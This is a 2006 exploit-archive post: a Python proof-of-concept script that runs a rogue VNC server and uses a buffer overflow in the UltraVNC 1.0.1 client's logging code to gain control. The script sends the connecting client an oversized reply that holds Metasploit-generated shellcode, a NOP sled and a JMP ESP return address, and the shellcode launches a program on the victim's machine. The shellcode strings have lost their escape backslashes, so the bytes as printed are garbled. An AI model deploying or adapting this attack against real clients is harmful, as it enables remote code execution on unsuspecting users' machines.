Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit :

Date : 2006-04-11 Author : Paul Haas
#!/usr/bin/python

#Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemm
#POC by Paul Haas at Redspin.com
#Tested on WinXP SP 2: Launches Calc
import socket, struct

HOST = ''                       # Localhost
PORT = 5900                     # VNC Server
BOFSZ = 1024                    # Buffer Size
HEAD = "RFB 003.006
"          # VNC Header
MESSAGE = "Requires Ultr@VNC Authentication
"
NOP = "x90"                    # Standard x86 NOP
JMP = "xE9x1BxFCxFFxFF"    # JMP To BUFF
ESP = "xE0x3AxB4x76"        # winmm.dll: JMP %esp
POP = "PASSWORD"                # RET 8

# win32_exec - CMD=calc Size=160 http://metasploit.com
SHELLCODE = 
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xe1"+
"x7cx05xd9x83xebxfcxe2xf4x1dx94x41xd9xe1x7cx8ex9c"+
"xddxf7x79xdcx99x7dxeax52xaex64x8ex86xc1x7dxeex90"+
"x6ax48x8exd8x0fx4dxc5x40x4dxf8xc5xadxe6xbdxcfxd4"+
"xe0xbexeex2dxdax28x21xddx94x99x8ex86xc5x7dxeexbf"+
"x6ax70x4ex52xbex60x04x32x6ax60x8exd8x0axf5x59xfd"+
"xe5xbfx34x19x85xf7x45xe9x64xbcx7dxd5x6ax3cx09x52"+
"x91x60xa8x52x89x74xeexd0x6axfcxb5xd9xe1x7cx8exb1"+
"xddx23x34x2fx81x2ax8cx21x62xbcx7ex89x89x8cx8fxdd"+
"xbex14x9dx27x6bx72x52x26x06x1fx64xb5x82x7cx05xd9"

#buff = MESSAGE+SHELLCODE+NOP SLED+RET ADDR+USELESS+JUMP TO BUFF
buff = MESSAGE+SHELLCODE+NOP*(BOFSZ-11-len(MESSAGE)-len(SHELLCODE))
buff = buff+ESP+POP+JMP

#Egg = VNC Server Error Reply and Size of Reply + buff
egg = struct.pack('LL',socket.htonl(0),socket.htonl(len(buff)))+buff

print 'Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemma'
print 'POC by Paul Haas at Redspin.com'
print 'Server listening on port', PORT

#Server Loop
while(1):
       s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       s.bind((HOST, PORT))
       s.listen(1)

       conn, addr = s.accept()
       print 'Connection by', addr

       conn.send(HEAD)
       data = conn.recv(12)

       conn.send(egg)
       conn.close()

# milw0rm.com [2006-04-11]

C1

 

C2

 

C3